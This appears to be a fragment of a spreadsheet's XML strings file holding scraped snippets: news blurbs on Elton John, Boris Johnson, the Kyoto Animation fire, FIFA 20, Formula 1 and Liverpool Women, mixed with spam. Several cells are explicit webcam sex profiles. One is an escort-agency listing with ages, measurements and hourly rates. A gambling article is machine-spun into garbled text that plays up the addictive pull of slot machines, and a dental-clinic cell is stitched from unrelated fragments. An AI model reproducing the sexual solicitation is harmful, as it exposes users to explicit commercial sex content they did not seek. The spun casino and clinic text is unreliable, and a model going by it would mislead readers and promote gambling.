    <t>Sir Elton John, his husband David Furnish and their sons Elijah and Zachary have been welcomed aboard the £40m super yacht, Siran, owned by millionaire property tycoon Bob Manoukian. And the family were seen re-boarding it in Sardinia, Italy, on Sunday, having stopped off to enjoy the local sights on land. Elton, 72, wore a brightly-coloured Hawaiian shirt for the excursion, once back on the boat. Family trip: Sir Elton John, his husband David Furnish and their sons Elijah and Zachary have been welcomed aboard the £40m super yacht, Siran, owned by millionaire property tycoon Bob Manoukian All aboard: The family were seen re-boarding it in Sardinia, Italy, on Sunday, having stopped off to enjoy the local sights on land The Your Song crooner had sported a smart baby blue blazer and shirt for their outing off the boat, changing back into his tropical ensemble on his return in order to relax on the waters with his friends and family. He was seen carefully navigating his way down the steps on board, to get to the lower deck, where he relaxed in the sunshine. David, 56, wore a black and cream pin-striped outfit which looked cool and flowing as he stepped out in the Mediterranean heat. Quick change: The Your Song crooner had sported a smart baby blue blazer and shirt for their outing off the boat, changing back into his tropical ensemble on his return in order to relax on the waters with his friends and family Shady: Both men shielded their eyes with sunglasses as they reclined on the deck Both men shielded their eyes with sunglasses. The crew – including the family’s bodyguards – were on hand to help the rocker off and on the yacht as they pulled up to it on a speedboat. With the couple were their beloved sons Zachary, eight, and Elijah, six, who ran around on the decks and enjoying playing in the sunshine.</t>
  </si>
  <si>
    <t>Rebecca Armitage</t>
  </si>
  <si>
    <t>Boris Johnson has triumphed over his rival Jeremy Hunt to become the new leader of the UK Conservative Party. Tomorrow he will visit the Queen and take over as prime minister.</t>
  </si>
  <si>
    <t>The arsonist-set fire that swept through the Kyoto Animation studio on July 18 has claimed its 35th life, according to Japanese media reports. Police have stated that the victim is a man in his twenties. The identities of all 35 dead have yet to be revealed. Another 33 employers of the studio were injured in […] Variety The post Kyoto Animation Fire Claims its 35th Victim appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Jason Contant</t>
  </si>
  <si>
    <t>Editor’s Note: This article is reprinted with permission from Truck News A national review by Facility Association, an insurer of last resort for fleets that can’t secure coverage elsewhere, is looking to keep trucking companies from misrepresenting themselves when… The post Why are a growing number of trucking fleets winding up in Facility Association? appeared first on Canadian Underwriter.</t>
  </si>
  <si>
    <t>artbyallcock14</t>
  </si>
  <si>
    <t>I’m deeply engaged these days with a series of pictures on which I’m working, revolving around the subject of creation/creativity. These combine in a variety of ways images drawn from the ancient creation myths in the book of Genesis, pictures of contemporary people engaged in one kind of creative activity or another, and very personal associations and experiences. I’m quite pleased so far with the way things are working out, but recognise that I am some way from completion. Yesterday I began to think seriously about one idea that has been hovering on the edge of awareness for a little while. It has to do with painting, and for some reason I am unable to fathom my attention was drawn to a picture of a small child experimenting with coloured pencils. At the moment my idea is that the child will be surrounded by a variety of other images suggesting the development of pictorial art. I’m making a list, and it is already clear that I am going to face problems both of selection (I have too much material) and composition. As I was doodling with possibilities of how the final product might be arranged, one idea asserted itself very strongly, and there is now no question that it will feature in there somewhere. There has to be a childish drawing of a rabbit. Why on earth so? The reason for this is strongly autobiographical. For some time I have been aware that my earliest memory of art is an experience of myself as a small boy (probably five or six years old) seated on the floor in front of the fire in the small cottage in which we liked in Norfolk, shortly after the war. My mother and grandmother were sewing. and singing together, while I drew. I have the clearest recollection that I drew rabbits, and the result was received with great acclaim. I have always receded this as the first seed of my development towards being an artist. Whatever else this picture contains, it must recapture this moment. However grand or formal or abstract the material on which artists work I do believe that the springs of art are always as deeply personal as my rabbits.</t>
  </si>
  <si>
    <t>Andrea Chamblee had never seen the drafts her husband agonised over for more than 10 years.John McNamara, 56, was almost done when he went to work on June 28, 2018.</t>
  </si>
  <si>
    <t>It involved seven vessels and focused on the areas of the Gulf where the most gear was reported lost or missing by fishermen.</t>
  </si>
  <si>
    <t>London: Standard or Deluxe Room for Two with Breakfast and Optional Tea or Dinner with Wine at The 4* Colonnade Hotel The post London: Standard or Deluxe Room for Two with Breakfast and Optional Tea or Dinner with Wine at The 4* Colonnade Hotel appeared first on 4UTODAY Online since 2004.</t>
  </si>
  <si>
    <t>Alex Worton</t>
  </si>
  <si>
    <t>The Best Approaches to Use mobile casino for real money in Your House. Position devices are hugely common all over the world. In fact, they’re simply probably the most played sport in the internet casino portals as well as the stone and mortar ones. Once you are at the slot machine, it http://vuevue.net/2019/07/18/factors-i-really-like-online-casino/ is hard to also look out for a moment. They stop you addicted onto them all day and hours together. They empty up pockets in no time. Thankfully, position devices are rather cheap and that’s probably one of why they’re so popular. Furthermore, there are a load of casino bonuses that allow you to play the slot products free. Let’s look at some applicable explanations why they are therefore fascinating to all demographics. The format it self is quite appealing. Think of it. You don’t need to learn how to enjoy the game. It’s the easiest issue ever. More over, it engages the dopamine process of our brains. Every small match provides you with that tingling emotion of pleasure and you want more and more of that. It practically takes you no time for you to play up the position machines. The way you missing a couple of hours and did not even understand it is obviously a different subject altogether. That does not take any time and it offers you fast results. And, when you yourself have one particular special no deposit bonus deals from the internet site, it makes the process actually easier and less time consuming. Online position models are innovating within the structure of the overall game as much as possible. This is helping in attracting new participants as well. As an example, no deposit bonuses get to all new members making it an extremely attractive deal. As well as that, paylines will also be being increased from 10 to 20. Occasionally, there are 243 and sometimes, there are actually 1024 methods to gain in a slot machine. All this just adds to the currently big appeal of the game. Unlike every different casino game on the planet, position devices are likely the only people that need simply no thought. You do not require a technique, there are no moves included from the opponent. It is merely you on the equipment playing a carefree game without having to engage your mind at all. That in itself is fairly rewarding. The particular benefits are, obviously, only an added bonus. Following a extended trip to function, all you intend to do is curl up with a simple and fun task to end the day. That is one of many significant reasons, quantity of people capture up the ceiling at night. Casino bonuses at the internet portals will also be a motivator for looking at the game at night. It is merely a thing that can be done without trading a lot of energy, physical or intellectual, in to it.</t>
  </si>
  <si>
    <t>Baku, Azerbaijan, July 23. Trend: The first day of volleyball competitions among men and women of the XV Summer European Youth Olympic Festival …</t>
  </si>
  <si>
    <t>My Kinks: Webcam profile: Calling all of you who want to have an exciting adventure in the world of RavenSundance you are welcome to join me! With a curvaceous body that I love to show off and amazing assets, you can see why I don’t like to sit still for very long! Cum for fun. Favourite sex position: I can shake my ass and tits very well and I have a big ass so we can have sexy fun with that! I will suck cock, fuck my lil cunt and ass at the same time, and lick my tits for you horny boys and girls! I love to please so just tell me what you want! What I do in my amateur show: I love to be caressed and licked on my inner thighs. I love my nipples being sucked on and I love a firm hand or hands grabbing my tits during sex. I also enjoy my clit being rubbed and teased and then dp at the same time! Come please me…pretty ple What I don’t like: Gallery</t>
  </si>
  <si>
    <t>FIFA 20 Ultimate Team Introduces New Game Modes And Icons With FIFA Ultimate Team making up an incredible 28% of EA Sports’ revenue last year, it’s no surprise that the gaming giant are again placing the mode at the forefront of FIFA 20. And for FIFA 20 Ultimate Team, EA have introduced a series of new game modes that are wildly over the top but have been designed to make it as fun and social as possible. New in #FUT 20 :arrow_down: :soccer: Season Objectives :soccer: FUT Friendlies :soccer: New Customization options :soccer: New Squad Management :soccer: Squad Battles Enhancements Get all the details: https://t.co/2pka2ArGcj pic.twitter.com/7HA2qHJWLL – EA SPORTS FIFA (@EASPORTSFIFA) July 31, 2019 FUT friendlies are now a thing so you can play offline or online in non-competitive games. You will still earn coins but your record, fatigue of players or contracts will not be affected. ‘Couch Play’ has also been brought in for those who like to play UT with and against their friends while they are in the room as opposed to online. ‘Max Chemistry’ sees chemistry completely thrown out of the window and all the focus on your ability, as well as a feature whereby you take three players from your opponent’s squad and swap them into your XI. If you score with a player you nabbed from your opponent, you will get two points. Then we have ‘King of the Hill’ – which promises to bring some absolute madness to proceedings. House Rules are now in #FUT! Choose from all returning custom rules or try the brand new ones, like King of the Hill or Mystery Ball. See the new way you can play #FUT: https://t.co/oEqSb0IghK pic.twitter.com/arODbs0MYu – EA SPORTS FIFA (@EASPORTSFIFA) July 31, 2019 In a nutshell, you have to control the ball in an attacking zone and continue to keep the ball as the space quickly decreases. At the same time, you get a goal meter that fills – and if you sustain the attack long enough to find the net – you get a specific amount of goals (max three) added to your tally as opposed to just one. There’s no realism involved here at all, but who is arguing against getting an extra three goals when they score? The most exciting new mode, though, is ‘Mystery Ball – which sees a series of different gameplay boosts activated whenever the ball goes out of player. Huge improvements to speed, dribbling, passing and shooting are added to the player in possession – with the deadly ‘All Ball’ increasing all of the aforementioned attributes. The former two modes are exclusive to the Ultimate Team but the latter two are also in Pro Clubs and Kick-Off as part of the other House Rules games. Also in Ultimate Team are a host of new ‘Icons’ such as Andrea Pirlo, Didier Drogba, Ronald Koeman, Ian Wright, Carlos Alberto and ‘Ultimate Edition’ cover star Zinedine Zidane, who finally gets a legendary card. Elsewhere in Ultimate Team, the menus are simpler and much easier to access your club, squad, players and the transfer market, while there’s an improved level of customisation courtesy of unlicensed badges, tifos, stadium themes and custom celebrations just for Ultimate Team. Milestones have been introduced to give the user short-term and long-term goals and extra incentive to win, along with daily, weekly, season and dynamic objectives to bring about more rewards than ever before. Earn XP. Level up. Get rewards. :arrow_right: Move up through the levels each Season to unlock better rewards in Season Objectives :arrow_right: Work towards your Milestone Objectives at your own pace See more on Objectives in #FUT 20: https://t.co/aERUKClosF pic.twitter.com/9QKVIJSzf2 – EA SPORTS FIFA (@EASPORTSFIFA) July 31, 2019 There are also in-depth stats such as per match averages so you can see just how much better at FIFA you are than all your mates. The head honchos at EA have also acted on feedback from players by changing the way in which matchmaking is done so that there are less kit clashes. You’ll be able to select playing against your opponent in your other kit for a guaranteed match experience, or the alternate option play against your opponent in one of their chosen kits. You won’t see your opponents kits and EA say they will use logic to determine which pair of kits are least similar and likely to cause confusion. More information on FUT 20 changes can be found on the ‘Pitch Notes’ page on the EA Sports FIFA website. This post FIFA 20 Ultimate Team Introduces New Game Modes And Icons appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>Leeper was born with both legs missing below the knees. Running on prosthetics at the U.S. outdoor track and field championships, he had smoked a field featuring some of the country's fastest able-bodied 400-meter runners.</t>
  </si>
  <si>
    <t>Steve Bruce has stated when he expects Newcastle United to make another signing after Saturday’s 2-1 defeat to Preston North End. The new Magpies boss took charge of his first game from the Newcastle dugout at Deepdale, overseeing the defeat and introducing new club-record signing Joelinton in the second half. Speaking to the Chronicle after the game, Bruce revealed he expects the club to be... Source</t>
  </si>
  <si>
    <t>The medal of a Nazi bodyguard who took five bullets aimed at Adolf Hitler has sold for a “world record price”. Read more? Click here</t>
  </si>
  <si>
    <t>All decisions will be made public after a "lack of transparency" surrounding 45 new poker machines at a Brisbane shopping centre.</t>
  </si>
  <si>
    <t>Theresa May looks back on her record at PMQs before she is cheered by colleagues as she leaves the chamber. Read more? Click here</t>
  </si>
  <si>
    <t>Street Fighter 6 will not be present at Evo 2019 next month, according to Yoshinori Ono of Capcom. Despite rumors on the Internet, Street Fighter 6 will not be visible at Evo 2019. That's what Yoshinori Ono said, as he and his team always worked hard on Street Fighter 5: Arcade Edition. I do not have SF6 … Who already said that? Our mind is only in one place, #SFVAE job! ;RE pic.twitter.com/BkBiTSkSTe – Yoshinori Ono (@Yoshi_OnoChin) July 25, 2019 https://platform.twitter.com/widgets.js If Street Fight 6 is well planned, we will probably not hear about it until the new generation systems arrive. Until then, Street Fighter 5 will be updated and we will have news about it in August, according to a previous tweet from Ono. Evo 2019, the biggest sporting game of the year, will take place on the first weekend of August. If Capcom plans to make an announcement of Street Fighter 5 at this event, it would not be a surprise. Last year, two new characters were unveiled at the event and made available to players the same day. The Street Fighter 6 post will not make its appearance at Evo 2019, according to Ono appeared first on VG247.</t>
  </si>
  <si>
    <t>My Kinks: Underwear, kisses, disguises, hugs Webcam profile: Hello! Join my wonderland if you wanna discover your fantasies and find some new ones. I’m here for that…full of passion lady. Favourite sex position: ALL What I do in my amateur show: I see myself with a right gentleman, walk down the street by holding hands, my smile says it all. What I don’t like: What turns me off are men who are disrespectful to the ladies, men who do not know basic greetings. Gallery</t>
  </si>
  <si>
    <t>Ross and Demelza (played by Eleanor Tomlinson) have had one of the rockiest relationships in television drama, but it’s also one of the most heart-wrenching. Meeting in unconventional circumstances, the couple fought against the odds despite the fact they were stacked against them. Ross struggled to move on from his first love Elizabeth (Heida Reed), and Demelza’s eye also wandered during season three. When Hugh Armitage (Josh Whitehouse) arrived on the scene he made a beeline for the beautiful red-head, and it truly seemed the fan-favourite couple were over for good. Luckily Ross and Demelza managed to come back to each other in season four, even with the father-of-two’s building career as a Member of Parliament. Two episodes in to season five of the hit drama, the married pair are presented as being stronger than ever. And while fans undoubtedly know there will be drama ahead before the series wraps, star Aidan Turner revealed his final scene was with his co-star Eleanor. Has he given away the couple’s “happy ending”? Speaking to Express.co.uk and other media, Aidan shared: “My favourite part of Ross’s evolution is he’s getting older, more responsible, wiser. “He’s a better listener, treats people with more respect I suppose, I don’t know, I’ve just been along for the journey. READ MORE: Poldark season 5 spoilers: BBC show to make dramatic return? “It’s hard to see it when you’re in the driver’s seat that evolution I suppose.” “[But Ross and Demelza have] overcome a lot of things haven’t they,” The Being Human actor continued. “I think they’re in a good place by the end of the series yeah…. Or he dies [laughs].” “It actually was pretty poignant our last day,” Aidan went on. “It was just myself and Eleanor in doing some of the bedroom scenes. “It was quite intimate and quite lovely and seemed to make sense that it was just the two of us I suppose, yeah it was poignant”. The star added his relationship with his co-star behind the scenes has always been “brilliant” and “amazing” because of how much they both care about their characters. “We’ve invested a lot in the show and the characters, we care deeply about it. “We get along great, but you know the work always comes first and it’s always been that way, yeah I don’t know, you click with someone on set, [we] always have,” Aidan added. The drama in this series has already kicked off and there are some mysteries afoot as new characters begin to show their hands in the middle of the Cornish drama. Some fans are more concerned with the mental state of reformed villain George Warleggan (Jack Farthing) though, as he continues to see hallucinations of his dead wife Elizabeth (Heida Reed). Poldark season five continues tonight at 9pm on BBC One. Source link</t>
  </si>
  <si>
    <t>Dr. Tanya Khattra and team welcome you and your entire family to our dental practice in Airdrie, AB. Solantra and her team are awesome, if you are looking for an amazing dental clinic give these guys a try! Via I highly recommend Sierra Springs Dental and. that is not available in other dental clinics. Fall Creek Dentistry is dedicated to providing excellent service and. Number 1 Dental Clinic Near Airdrie Both can accommodate indoor and outdoor seating areas, and one includes a dedicated drive-thru. “We are actively pursuing all. Bridge Medical Clinic Airdrie, Alberta postal code T4B 0V7. See Google profile, Hours, Phone, Website and more for this business. 3.5 Province testing one-stop ‘hubs’ for youth in need – To Hutton, 361 youth in need seems high, but the number appears to be falling. and begun work with the Airdrie Mental Heal. Dr. Neil McDermid has a 4.6/5 rating from patients. Visit RateMDs for Dr. Neil. It can be found on 28 Gateway Dr NE Unit 101 near the superstore. Dr. Dwayne Kowalchuck also said: “While Confidental Airdrie may not be the only dental clinic with this kind of offering, local. Quattro Dental has. The clinic recently achieved Quality Innovation Performance accreditation which, says Michael, is an. But at the Dr. Silman Smile Spa has the most accommodating and friendly staff and. for oral protection and dental health. Cosmetic Dentist Near Airdrie Alberta Airdrie Stonegate Health and Dental Clinic Launches New Teeth Whitening Service – In a slightly different approach to launching its new Forever Smiles Teeth Whitening Service, Confidental Airdrie, a Dentist in Airdrie AB has decided it will offering. It can Most Popular Dental Clinic In Airdrie A dentist in Nantou County has made a name for himself with his unconventional way of reaching patients: a mobile clinic. that is not available in other dental clinics. Fall Creek Dentistry is dedicated to providing excellent service and. Barbados Invisalign Dental Braces Saint Michael Dentist Treatments Announced – The Saint Michael dental clinic is known for its friendly, high quality treatments. Dr Golding’s Dental Office has announced.</t>
  </si>
  <si>
    <t>Wolves 2-0 Crusaders Goals: Diogo Jota (£6.5m), Ruben Vinagre (£4.5m) Assists: Adama Traoré (£5.0m), Joao Moutinho (£5.5m) Diogo ...</t>
  </si>
  <si>
    <t>Melissa Joan Hart was “really emotional” after learning she had to go back for more tests. See full article at Film-news.co.uk » The post Melissa Joan Hart urges fans to take advantage of mammograms after scare appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>On his first day of training camp following a hectic offseason, Kansas City Chiefs quarterback Patrick Mahomes recorded a lower body fat percentage and more muscle than last year. Source: Sports Business News</t>
  </si>
  <si>
    <t>Go on an exciting city break with a 2-3 night stay in Paris Stay at the Art Hotel Have a room with en suite, air-conditioning, Wi-Fi access and a TV Hotel is near good transport links into the centre of Paris Catch a view of the whole city from the famous Eiffel Tower Explore the Louvre Museum featuring Da Vinci’s Mona Lisa Be impressed by the Arc de Triomphe and walk the Champs-Élysées Visit the beautiful Sacré-Cœur hilltop basilica with interior mosaics London Flights Luton (LTN), Gatwick (LGW) or Heathrow (LHR) Regional Flights Manchester (MAN) Travel Center is ATOL Protected: 3517 Travel Center is ABTA Protected: Y6438, P7124 Holidays Normal Price: £ 165.34 Offer Price: GBP89.00 The post 2-3 Night Hotel Stay with Flights appeared first on 4UTODAY Online since 2004.</t>
  </si>
  <si>
    <t>The suspect was allegedly armed with a shotgun, but police say he was not able to gain entry to the bank after an employee ran and locked the door.</t>
  </si>
  <si>
    <t>Are the Ticats still the team to beat in the east? And how much heat should Mike Reilly be taking for the Lion’s record? Plus, William Stanback stops in to talk food and football in la belle province.</t>
  </si>
  <si>
    <t>Fergus Hunter</t>
  </si>
  <si>
    <t>Previously undisclosed contracts between Australian universities and the Chinese government reveal varying approaches to safeguarding academic autonomy.</t>
  </si>
  <si>
    <t>Prime Minister Paul Keating rejected claims that he had a secret agenda to abolish the States as part of his push for a republic by the end of the century.</t>
  </si>
  <si>
    <t>In a massive blow to the Eels' finals chances, the NSW star remains hospitalised due to a knee infection with the club unable to give a return date.</t>
  </si>
  <si>
    <t>GJVlogs</t>
  </si>
  <si>
    <t>https://bit.ly/2PctE6V Hello mga ka-GJ. Another get ready with me and unboxing uli, and this time dumami dahil sa mga sale na nagdaan, na engganyo kami mag maraming order. source</t>
  </si>
  <si>
    <t>The Queensland parliamentary committee system has "atrophied", according to prominent lawyer Terry O'Gorman.</t>
  </si>
  <si>
    <t>The Dart River Wilderness Jet trip is an exhilarating and spectacular journey deep into the heart of the world-renowned Mt Aspiring National Park with the only jet boat operator allowed on the Dart River. source The post Dart River Wilderness Jet – Extended Version appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>My Kinks: Webcam profile: Favourite sex position: What I do in my amateur show: What I don’t like: Gallery</t>
  </si>
  <si>
    <t>Works like this: I feed you Moon Nukers a straight line, and you hit me with a punch line in the comments. A Chinese satellite crashed to Earth. On it was… 0 0</t>
  </si>
  <si>
    <t>Tom Roulston</t>
  </si>
  <si>
    <t>Walker's project is proposing a study that would gather 15 participants to photographically document community assets and concerns around violence, safety and accountability.</t>
  </si>
  <si>
    <t>Welcome to escorts in Draycot OX9, covering the whole area of Oxfordshire. We have escorts serving the flats, homes and local hotels in Draycot and the surrounding Oxfordshire areas. Draycot Escort Oxfordshire Escort Services Draycot Escorts - Girls Who Know How to Fulfill You in Oxfordshire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Draycot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Draycot escorts are women who receive hundreds of compliments from their men because of the type of services that they provide them. There are quite a lot of escorts in the area, but not all of them can deliver what they promise. When you hire a beautiful companion tonight, only go for the best one who will compliment your personality. Go for the best escort agency and finding the best escort would not be very difficult. She can perform for you, and she can wonderfully caress you. You can evaluate the services of these ladies and compare them to the services provided by other escorts to know where these wonderful ladies stand. Escorts in Draycot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Draycot,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Pearl Location: Draycot (OX9 2) Nationality: South African Spoken Language: English, Arabic Age: 23 years old Weight: 45.0kg (99lb) (7st - 1lb) Height: 5 feet 10 inches (177.80cm) Dress Size: L Shoe Size: 41 Hair Leigh: Long Hair Color: Brown Eye Color: Red Breast: Natural Breast Size: B Pubic Hair: Trimmed Tattooed: No Piercings: Yes Smoking: No Drinking: No Availability Area: Draycot Outcall: Oxfordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Pearl Escort Name: Sahara Location: Draycot (OX9 2) Nationality: Canadian Spoken Language: English, Bulgarian Age: 25 years old Weight: 46.4kg (102lb) (7st - 4lb) Height: 5 feet 1 inches (154.94cm) Dress Size: M Shoe Size: 38 Hair Leigh: Medium-Length Hair Color: Sapphire Eye Color: Gray Breast: Natural Breast Size: B Pubic Hair: Trimmed Tattooed: No Piercings: Yes Smoking: Occasionally Drinking: Yes Availability Area: Draycot Outcall: Oxfordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Sahara Escort Name: Arielle Location: Draycot (OX9 2) Nationality: Irish Spoken Language: English, Slovak Age: 33 years old Weight: 46.8kg (103lb) (7st - 5lb) Height: 5 feet 5 inches (165.10cm) Dress Size: L Shoe Size: 36 Hair Leigh: Short Hair Color: Red Eye Color: Violet Breast: Natural Breast Size: C Pubic Hair: Trimmed Tattooed: No Piercings: No Smoking: No Drinking: Yes Availability Area: Draycot Outcall: Oxfordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Arielle Escort Name: Tatum Location: Draycot (OX9 2) Nationality: Jamaican Spoken Language: English, Czech Age: 20 years old Weight: 55.5kg (122lb) (8st - 10lb) Height: 5 feet 6 inches (167.74cm) Dress Size: XL Shoe Size: 39 Hair Leigh: Short Hair Color: Bronde Eye Color: Hazel Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: No Drinking: Yes Availability Area: Draycot Outcall: Oxfordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Tatum Escort Name: Jamie Location: Draycot (OX9 2) Nationality: Romanian Spoken Language: English, Portuguese Age: 25 years old Weight: 61.4kg (135lb) (9st - 9lb) Height: 5 feet 5 inches (165.10cm) Dress Size: M Shoe Size: 40 Hair Leigh: Short Hair Color: Red Eye Color: Brown Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: No Drinking: Occasionally Availability Area: Draycot Outcall: Oxfordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Jamie Escort Name: Harmony Location: Draycot (OX9 2) Nationality: English Spoken Language: English, Korean Age: 26 years old Weight: 48.2kg (106lb) (7st - 8lb) Height: 5 feet 7 inches (170.18cm) Dress Size: S Shoe Size: 35 Hair Leigh: Long Hair Color: Blonde Eye Color: Brown Breast: Natural Breast Size: DD Pubic Hair: Trimmed Tattooed: No Piercings: No Smoking: No Drinking: Occasionally Availability Area: Draycot Outcall: Oxfordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Harmony Draycot French Escort, Draycot Scottish Escort, Draycot Best Escort, Draycot Blonde Escort, Draycot Brazilian Escort, Draycot British Escort, Draycot Erotic Escort, Draycot Agency Escort, Draycot Massage Escort, Draycot Black Escort, Draycot Gay Escort, Draycot Independent Escort, Draycot Ebony Escort, Draycot Brunette Escort, Draycot Indian Escort, Draycot Chinese Escort, Draycot Young Escort, Draycot Incall Escort, Draycot Busty Escort, Draycot Polish Escort, Draycot Indian Escort, Draycot Female Escort, Draycot Teen Escort, Draycot Mature Escort, Draycot Porn Escort, Draycot Spanish Escort, Draycot Asian Escort, Draycot Outcall Escort , Draycot Male Escort, Draycot Bisexual Escort, Draycot Cheap Escort, Draycot Walsh Escort, Draycot Horny Escort, Draycot Irish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Draycot appeared first on Escort Info UK.</t>
  </si>
  <si>
    <t>MateBiz</t>
  </si>
  <si>
    <t>https://bit.ly/2PctE6V An eCommerce web site desires totally different services for its entire development within the most triple-crown procedure. One will continually rent eCommerce … source</t>
  </si>
  <si>
    <t>THE GOVERNMENT has been urged to extend support for families to stop children going hungry during the school holidays. Read more? Click here</t>
  </si>
  <si>
    <t>GWS Giants spearhead Jeremy Cameron has had more shots on goal than any other player in the AFL this season and admits he should have converted more of them.</t>
  </si>
  <si>
    <t>Jason Mennell</t>
  </si>
  <si>
    <t>Connor Fewkes shot three-over to wrap up eighth spot in a field of 100 at the Singapore Open Amateur Championship</t>
  </si>
  <si>
    <t>As Hong Kong convulses amid weeks of protests, demonstrators and the police have turned identity into a weapon.</t>
  </si>
  <si>
    <t>Samsung Electronics Co Ltd said it expected the chip market to bottom out and start to recover in the second half as it posted a 56% drop in quarterly profit on Wednesday, hit by declines in semiconductor prices amid oversupply.</t>
  </si>
  <si>
    <t>The Asus ROG Phone 2 is an update to the gamer-centric ROG Phone from 2018. It looks eerily similar, with the same edgy metallic design and glowing Republic of Gamers logo on the back. At first glance you might not realize the phone has changed at all, and yet there are actually a ton of updates in this year’s ROG Phone. You just have to know where… Android Authority The post Asus ROG Phone 2 hands-on: Overkill appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Lucy Cormack</t>
  </si>
  <si>
    <t>The high-profile detective has been charged with making illegal recordings during the investigation into the disappearance of William Tyrrell.</t>
  </si>
  <si>
    <t>zzkazu</t>
  </si>
  <si>
    <t>Seems like a good price for Glass Polarised Spotters, other non glass variants may be cheaper elsewhere.</t>
  </si>
  <si>
    <t>After his superb comeback drive in Germany, Sebastian Vettel heads to the 2019 Hungarian Grand Prix still in search of his first victory of the year. Vettel was one of many drivers who starred last time out at the German Grand Prix, coming from twentieth on the grid to finish in second at his home race. It was a rare highlight in what has been a frustrating year for the four-time world champion who is yet to better second place in 2019. The same can be said for his team Scuderia Ferrari who have seen potential victories taken away in Bahrain, Austria and controversially, Canada. Now though, they head to the Hungaroring, scene of seven victories for the Scuderia, two of which coming at the hands of Vettel, victorious in 2015 and 2017. The German knows his way around the tight Hungarian track with three other podium finishes to add to his two wins there at a circuit he says can “punish you hard.” “Hungaroring is a pretty physical track in a current Formula 1 car, because there aren`t any long straights and it’s a very stop-start circuit, which means you are always working away at the wheel,” says Vettel. “And given the time of year, it’s usually boiling hot, which definitely doesn’t help. “Also if it is dry, the circuit gets very dusty, particularly at the start of the weekend and it’s not a given that it will improve over the weekend, as wind and off track excursions brings back the sand that the cars running clear off the track. That means it will punish you hard if you get offline, or if you make a mistake, because you lose time and other drivers will be waiting to take advantage.” The Hungaroring has come under criticism from fans and drivers in the past owing to its tight and twisty layout failing to be conducive to good racing. Vettel offers advice on where overtaking is possible, but admits “there are no guarantees.” “The key corners are 1 and 14. Turn 1 you can think about a passing move but it’s a bit risky, as the straight before is too short really. There’s also potential, if you’ve had a god run on the exit of 14, but there are no guarantees”. Vettel heads to Hungary fourth in the drivers’ standings, eighty-four points adrift of championship leader Lewis Hamilton. Ferrari meanwhile, are coming under threat in the constructors’ title race, as Red Bull Racing have closed to within forty-four points of their second place, with Mercedes-AMG Motorsport a mammoth 148-points clear in the lead.</t>
  </si>
  <si>
    <t>Felicity Urquhart was meant to be celebrating her first solo album Frozen Rabbit with her husband Glen Hannah, but a month after its release, he took his own life.</t>
  </si>
  <si>
    <t>Want to be lulled to sleep by soft sheets? Try the 3-Piece Brushed Bed Sheet Set. Choose from a huge range of colours to suit any interior 3-piece set comes with: 1 x bed sheet, 1 x quilt cover and 1 x pillow cover Super-soft, breathable and long-lasting so you can rest easy for years to come Machine washable in cold water Remove from the tumble-drier right away and it will lay perfectly flat without ironing. Choose from 14 colours: green, apricot, black, blue-grey, brown, grey, khaki, light grey Or: navy blue, pink, purple, red, true blue or white Available in 4 bed sizes: twin, full, queen or king See Full Details for product dimensions Buying Options: 12.99 pounds instead of 59.99 pounds for the Twin option – save 78% 15.99 pounds instead of 59.99 pounds for the Full option – save 73% 15.99 pounds instead of 59.99 pounds for the Queen option – save 73% 19.99 pounds instead of 59.99 pounds for the King option – save 67% Home Accessories Normal Price: £ 59.99 Offer Price: GBP12.99 The post 3-Piece Brushed Bed Sheet Set – 14 Colours &amp; 4 Sizes appeared first on 4UTODAY Online since 2004.</t>
  </si>
  <si>
    <t>Romania's police chief is fired over his handling of the murder of the girl named Alexandra — and possibly another teenager — after it was revealed she made three emergency calls but it still took officers 19 hours to enter the suspect's house.</t>
  </si>
  <si>
    <t>“I’m able to work eight hours a day, which I couldn’t do before. I definitely have increased movement in my hands."</t>
  </si>
  <si>
    <t>My Kinks: I love the feet Webcam profile: I am an extrovert girl who is passionate about music and easily falls in love with them Favourite sex position: the position of the missionary What I do in my amateur show: I like men who are older than me it whispers what they love from my body to my ear What I don’t like: the people with bad education Gallery</t>
  </si>
  <si>
    <t>There were many who hypothesised that Cameron Bancroft may never return to the international arena after the Cape Town scandal. They look to be wrong.</t>
  </si>
  <si>
    <t>Our latest Numbers Game article focuses on Everton, who many Fantasy managers are backing in their droves ahead ...</t>
  </si>
  <si>
    <t>Source: https://www.wired.com/story/robert-mueller-testimony-congress-questions-trump-russia Robert Mueller’s Testimony: What Congress Needs to Know Here’s what members of Congress should know before they question the former special counsel. Source: https://www.wired.com/story/robert-mueller-testimony-congress-questions-trump-russia The post Robert Mueller’s Testimony: What Congress Needs to Know appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Liverpool Women enjoyed a 6-0 win over the Metropolitan All Stars team in Boston Private jets, official club buses – even bear hugs from Jurgen Klopp. It was a dream pre-season for Liverpool Women. Last year, the women’s team toured separately to Germany. This summer, for the first time, the squad were invited to join the men’s team on their tour of the United States. In England we are not a priority. In the US, they were in awe of what we were doing Vicky Jepson The women travelled alongside the European men’s champions, trained at the same facilities and stayed in the same hotels. They played in different stadiums but enjoyed “outstanding facilities” at Harvard University and Notre Dame University. On the field, they came home with a 2-2 draw and a 6-0 win – experiences which manager Vicky Jepson hopes will help them improve on last season’s eighth-place finish in the Women’s Super League. Off the field, she hopes it is a sign of a new standing for the women’s game. ‘They had to pinch themselves’ Women’s manager Vicky Jepson (second left) and captain Sophie Bradley-Auckland joined men’s manager Jurgen Klopp and captain Jordan Henderson on the flight During their stay in Boston, the women travelled on the official Big Red team bus, something Jepson says was one of those “little things which made the trip special”. They flew out on a private jet from Manchester – many of the women posting images on Instagram – while Jepson said her players were chatting with the men’s squad on the flight to the States. “It wasn’t just for the cameras, we did a lot of interacting with them at different events,” she told BBC Sport. 